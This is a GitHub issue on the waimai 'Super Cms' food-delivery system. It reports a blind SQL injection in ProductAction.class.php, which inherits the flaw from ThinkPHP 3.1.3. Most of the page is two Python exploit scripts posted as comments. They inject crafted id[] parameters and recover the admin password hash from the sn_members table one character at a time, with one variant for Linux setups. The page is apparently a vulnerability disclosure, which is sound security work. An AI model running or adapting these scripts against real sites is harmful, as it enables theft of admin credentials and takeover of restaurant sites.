search

caokang / waimai

超级外卖 Super Cms是专业的外卖订餐系统,使用它,不用写代码,只要会打字,就可以管理网站。 前台设计采用采用html5与css3设计,兼容IE6+、Firefox、Chrome、Safari、Opera等主流浏览器. 并可以在微博,微信中完美显示。后台功能模块化设计,用户操作方便。 易于上手,即安即用。 适合餐馆,酒店,外卖平台,糕点店,海鲜店【此地址用于维护】,详细问题,见链接
MIT License
142 stars 83 forks source link

There is a SQL Injection vulnerability #9

Open m4yfly opened 5 years ago

m4yfly commented 5 years ago

There is a blind sql injection.

waimaiCMS is based on thinkphp3.1.3, vulnerable code in web/Lib/Action/ProductAction.class.php 

    public function index(){
     $data['fid']=I('id');//店铺分类
          $Food=M('Food');
      $fooditem=$Food->where($data)->find();
      $this->assign('fooditem',$fooditem);
      $this->display();
   }

exp to get admin password here:

#!/usr/bin/bash
#coding:utf-8
import requests
import string

password = ''
string_list = string.ascii_lowercase + string.digits

url = "http://localhost:8000/"
prefix = "product?id[0]=in%20(%27xx%27))%20or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,"
payload = ")=%27"
suffix = "%27%20--%20"

for i in range(32):
    for s in string_list:
        final_url = url + prefix + str(i+1) + payload + password + s + suffix
        res = requests.get(final_url)
        if '<img src=""' not in res.content:
            password += s
            continue
    print password
m4yfly commented 5 years ago

If you test it with linux, this will helpful:

#!/usr/bin/bash
#coding:utf-8
import requests
import string

password = ''
string_list = string.ascii_lowercase + string.digits

url = "http://localhost"
prefix = "/index.php?m=product&a=index&id[0]=in%20(%27xx%27))/*&id[1]=*/or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,"
payload = ")=%27"
suffix = "%27%20--%20&id[2]=exp"

for i in range(32):
    for s in string_list:
        final_url = url + prefix + str(i+1) + payload + password + s + suffix
        res = requests.get(final_url)
        if '<img src=""' not in res.content:
            password += s
            continue
    print password